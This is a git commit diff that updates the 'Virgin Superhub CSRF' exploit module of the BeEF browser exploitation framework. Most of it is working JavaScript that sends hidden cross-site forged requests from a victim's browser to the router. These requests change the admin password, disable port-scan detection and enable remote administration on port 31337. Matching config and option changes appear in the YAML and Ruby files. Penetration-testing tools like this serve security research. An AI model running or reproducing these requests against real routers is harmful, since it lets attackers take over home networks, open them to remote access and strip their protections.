Updated virgin_superhub_csrf module

Now disables firewall and enabled remote administration Fixes issue #705 Fixes issue #706 Fixes issue #707
2012-06-25 11:18:28 +09:30
parent d5acc6409e
commit 123b81b2b4
3 changed files with 18 additions and 5 deletions
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -17,17 +17,29 @@ beef.execute(function() {

 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';

-	var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
-		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
+	var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
 		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
 	]);

+	var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+		{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+	]);
+
+	var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+		{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
+		{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+	]);
+
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

 	cleanup = function() {
-		document.body.removeChild(virgin_superhub_iframe);
+		document.body.removeChild(virgin_superhub_iframe1);
+		document.body.removeChild(virgin_superhub_iframe2);
+		document.body.removeChild(virgin_superhub_iframe3);
 	}
 	setTimeout("cleanup()", 15000);

--- a/modules/exploits/router/virgin_superhub_csrf/config.yaml
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -19,7 +19,7 @@ beef:
            enable: true
            category: ["Exploits", "Router"]
            name: "Virgin Superhub CSRF"
-            description: "Attempts to change the admin password on a Virgin Superhub router."
+            description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
            authors: ["bcoles", "n0x00"]
            target:
                working: ["ALL"]
--- a/modules/exploits/router/virgin_superhub_csrf/module.rb
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -18,7 +18,8 @@ class Virgin_superhub_csrf < BeEF::Core::Command
 	def self.options
 		return [
 			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'}, 
-			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
+			{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
 		]
 	end